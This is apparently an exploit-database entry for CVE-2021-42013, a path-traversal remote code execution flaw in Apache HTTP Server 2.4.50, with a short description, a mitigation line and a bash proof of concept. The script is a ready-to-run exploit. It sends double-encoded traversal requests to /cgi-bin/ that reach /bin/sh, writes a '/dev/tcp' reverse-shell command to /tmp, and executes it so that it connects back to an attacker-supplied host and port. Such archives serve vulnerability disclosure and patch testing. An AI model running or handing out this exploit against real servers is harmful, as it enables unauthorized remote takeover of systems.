Exploit: Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (2)

vendor:

Apache HTTP Server

by:

Ash Daulton & cPanel Security Team

9.8

CVSS

CRITICAL

Remote Code Execution (RCE)

CWE

Product Name: Apache HTTP Server

Affected Version From: Apache 2.4.50

Affected Version To: Apache 2.4.50

Patch Exists: YES

Related CWE: CVE-2021-42013

CPE: a:apache:http_server:2.4.50

Other Scripts:

Platforms Tested: Debian 5.10.28

2021

Exploit: Apache HTTP Server 2.4.50 – Remote Code Execution (RCE) (2)

This exploit is a bash script that can be used to gain a reverse shell on Apache 2.4.50 with CGI enabled. The script takes three parameters: the URL of the target, the local host IP address, and the local port. It then sends two curl requests to the target, the first of which creates a shell script in the /tmp directory, and the second of which executes the shell script.

Mitigation:

Disable CGI on Apache 2.4.50, or upgrade to a newer version of Apache.

Source

Exploit-DB raw data:

# Exploit: Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (2)
# Credits: Ash Daulton & cPanel Security Team
# Date: 24/07/2021
# Exploit Author: TheLastVvV.com
# Vendor Homepage:  https://apache.org/
# Version: Apache 2.4.50 with CGI enable
# Tested on : Debian 5.10.28
# CVE : CVE-2021-42013

#!/bin/bash

echo 'PoC CVE-2021-42013 reverse shell Apache 2.4.50 with CGI'
if [ $# -eq 0 ]
then
echo  "try: ./$0 http://ip:port LHOST LPORT"
exit 1
fi
curl "$1/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh" -d "echo Content-Type: text/plain; echo; echo '/bin/sh -i >& /dev/tcp/$2/$3 0>&1' > /tmp/revoshell.sh" && curl "$1/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh" -d "echo Content-Type: text/plain; echo; bash  /tmp/revoshell.sh"

#usage chmod -x CVE-2021-42013.sh
#./CVE-2021-42013_reverseshell.sh http://ip:port/ LHOST LPORT